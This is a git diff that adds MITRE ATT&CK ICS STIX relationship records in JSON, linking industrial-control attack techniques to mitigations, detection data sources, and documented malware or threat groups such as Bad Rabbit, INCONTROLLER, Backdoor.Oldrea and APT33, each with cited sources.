@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--99635a42-1b05-4b6c-99e8-b0af13b71fdc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Perform integrity checks of firmware before uploading it on a device. Utilize cryptographic hashes to verify the firmware has not been tampered with by comparing it to a trusted hash of the firmware. This could be from trusted data sources (e.g., vendor site) or through a third-party verification service.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--052552e9-eac0-4b37-9df8-2e921053e305.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--052552e9-eac0-4b37-9df8-2e921053e305.json new file mode 100644 index 0000000000000000000000000000000000000000..2bfc7ae2471c1a15d327abcf2a8a08c3b53c9be1 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--052552e9-eac0-4b37-9df8-2e921053e305.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--b191c7c5-d8d4-476a-b10f-b11bf7e9e52f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--052552e9-eac0-4b37-9df8-2e921053e305", + "created": "2023-03-30T19:05:17.003Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:05:17.003Z", + "description": "Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (e.g., .pdf, .docx, .jpg, .dwg ) or local databases.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--058396ca-3af4-444b-b261-74485c47e68c.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--058396ca-3af4-444b-b261-74485c47e68c.json new file mode 100644 index 0000000000000000000000000000000000000000..9fb783318314ac6d6c20a5128a5069baa13f3fbb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--058396ca-3af4-444b-b261-74485c47e68c.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--97f4700c-8801-4444-a132-e9023fdd5a94", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--058396ca-3af4-444b-b261-74485c47e68c", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:30:17.124Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) initially infected IT networks, but by means of an exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--064dfd6f-db5d-48e8-b350-9dd47a270911.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--064dfd6f-db5d-48e8-b350-9dd47a270911.json new file mode 100644 index 0000000000000000000000000000000000000000..6c268c8446016b56838b47c08c12ed335d1f5452 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--064dfd6f-db5d-48e8-b350-9dd47a270911.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--fd96f454-33b5-4544-8fab-403822fc94b8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--064dfd6f-db5d-48e8-b350-9dd47a270911", + "created": "2022-09-28T20:22:09.916Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:16:59.156Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can remotely read the OCP UA structure from devices.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06782c99-93de-4db9-9c30-6f96aef894d2.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06782c99-93de-4db9-9c30-6f96aef894d2.json new file mode 100644 index 0000000000000000000000000000000000000000..0bec267d3f76c71911b614db57c2644b92aa1a30 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06782c99-93de-4db9-9c30-6f96aef894d2.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--7edd1292-92ce-4981-82d2-bf3b186da4d5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06782c99-93de-4db9-9c30-6f96aef894d2", + "created": "2023-03-30T19:06:49.501Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:06:49.501Z", + "description": "Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--067932c3-0011-4ca2-9bbe-721c631e4e41.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--067932c3-0011-4ca2-9bbe-721c631e4e41.json new file mode 100644 index 0000000000000000000000000000000000000000..5829800629cb3d8300d1ebb9bccace7e40ddcd27 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--067932c3-0011-4ca2-9bbe-721c631e4e41.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--320eee39-b451-423e-857c-9618106ebb70", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--067932c3-0011-4ca2-9bbe-721c631e4e41", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 22 Advisory (ICSA-14-178-01) Retrieved. 2019/04/01 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:19:04.571Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) payload gathers server information that includes CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth. This information helps indicate the role the server has in the control process. (Citation: ICS-CERT August 2018) (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06f15629-d050-434a-aed1-3bb3f90c97b2.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06f15629-d050-434a-aed1-3bb3f90c97b2.json new file mode 100644 index 0000000000000000000000000000000000000000..6b8f907652193d2699fa2bce398585bbc03cdda7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06f15629-d050-434a-aed1-3bb3f90c97b2.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--623c6ed4-501d-4959-986c-72c6cb055cf1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06f15629-d050-434a-aed1-3bb3f90c97b2", + "created": "2022-09-27T15:22:37.864Z", + "revoked": false, + "external_references": [ + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:22:37.864Z", + "description": "Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL) For added context on adversary procedures and background see [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd.json new file mode 100644 index 0000000000000000000000000000000000000000..6a83775c160e2cc2d582e9fb6fecfeb01cd247ff --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--217c2f46-98bd-4031-bc92-2f70d905eecc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:12:43.166Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if messages over serial COM ports are blocked.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07c0e166-f05e-413f-8f3e-f487317c9626.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07c0e166-f05e-413f-8f3e-f487317c9626.json new file mode 100644 index 0000000000000000000000000000000000000000..8c84bcd703496a3d5b2a9c842bc06386f8418180 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07c0e166-f05e-413f-8f3e-f487317c9626.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--79dc31fc-e363-4491-be71-f3762c1daf81", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--07c0e166-f05e-413f-8f3e-f487317c9626", + "created": "2023-03-22T15:53:59.953Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-22T15:53:59.953Z", + "description": "Devices and programs that receive command messages from remote systems (e.g., control servers) should verify those commands before taking any actions on them.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07f4d65d-4572-450f-8cb2-908fee97bd67.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07f4d65d-4572-450f-8cb2-908fee97bd67.json new file mode 100644 index 0000000000000000000000000000000000000000..d7a8bc1610475b7b32fd003891a4816526824d57 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--07f4d65d-4572-450f-8cb2-908fee97bd67.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--f2f82719-f987-46cd-920c-cd4a94bab3e3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--07f4d65d-4572-450f-8cb2-908fee97bd67", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "Application control may be able to prevent the running of executables masquerading as other files.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08302021-aacf-428f-a0ce-e1034d925fb0.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08302021-aacf-428f-a0ce-e1034d925fb0.json new file mode 100644 index 0000000000000000000000000000000000000000..80a10430f0bc1f920864e2dabc28ea492854646d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08302021-aacf-428f-a0ce-e1034d925fb0.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--cd71570c-b9f4-47b7-a64c-f08980edd2a2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--08302021-aacf-428f-a0ce-e1034d925fb0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.115Z", + "relationship_type": "mitigates", + "description": "Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.\n", + "source_ref": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--088580e9-ccea-426e-9411-c1de60de650d.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--088580e9-ccea-426e-9411-c1de60de650d.json new file mode 100644 index 0000000000000000000000000000000000000000..956816c0ffae6215a764ce2942b30071539dae9e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--088580e9-ccea-426e-9411-c1de60de650d.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--43a39739-58d3-447d-858e-ba28bf65307c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--088580e9-ccea-426e-9411-c1de60de650d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.206Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7.json new file mode 100644 index 0000000000000000000000000000000000000000..46691c120f6d8268d44c03171ee2c412410606b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--2eaf09e1-84be-4ea0-9177-1f00128cdb36", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:57:47.375Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09977105-562f-4f45-a151-27a11a18031e.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09977105-562f-4f45-a151-27a11a18031e.json new file mode 100644 index 0000000000000000000000000000000000000000..71fcf46736ecf9d72b1bd070c3ae27287f81dcc2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09977105-562f-4f45-a151-27a11a18031e.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--602477fd-fbb3-4d1e-8f45-2156f314c36e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--09977105-562f-4f45-a151-27a11a18031e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.164Z", + "relationship_type": "mitigates", + "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9.json new file mode 100644 index 0000000000000000000000000000000000000000..c70dd65f6644df7f36681df80919b3f738d0f054 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--94e68f29-2e65-46c7-bda0-9a9310a0e6f6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:41:46.146Z", + "description": "Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0b7f643e-8975-4998-acbb-7405fa944a68.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0b7f643e-8975-4998-acbb-7405fa944a68.json new file mode 100644 index 0000000000000000000000000000000000000000..c399abda65be77e9675f41c5abcf14f51fa721fc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0b7f643e-8975-4998-acbb-7405fa944a68.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--2f5bf0b7-e8b8-4657-8eac-a98e7d79a2d8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b7f643e-8975-4998-acbb-7405fa944a68", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:54:38.303Z", + "description": "Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Also monitor executed commands and arguments that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae.json new file mode 100644 index 0000000000000000000000000000000000000000..8f0ad87b76303ff676473f98a152dbbcfe70d446 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--c39ce600-df27-4271-ac80-3c5454c730a1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jacqueline O'Leary et al. September 2017", + "description": "Jacqueline O'Leary et al. 2017, September 20 Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware Retrieved. 2019/12/02 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Junnosuke Yagi March 2017", + "description": "Junnosuke Yagi 2017, March 07 Trojan.Stonedrill Retrieved. 2019/12/05 ", + "url": "https://www.symantec.com/security-center/writeup/2017-030708-4403-99" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:41:15.111Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) utilize backdoors capable of capturing screenshots once installed on a system. (Citation: Jacqueline O'Leary et al. September 2017)(Citation: Junnosuke Yagi March 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
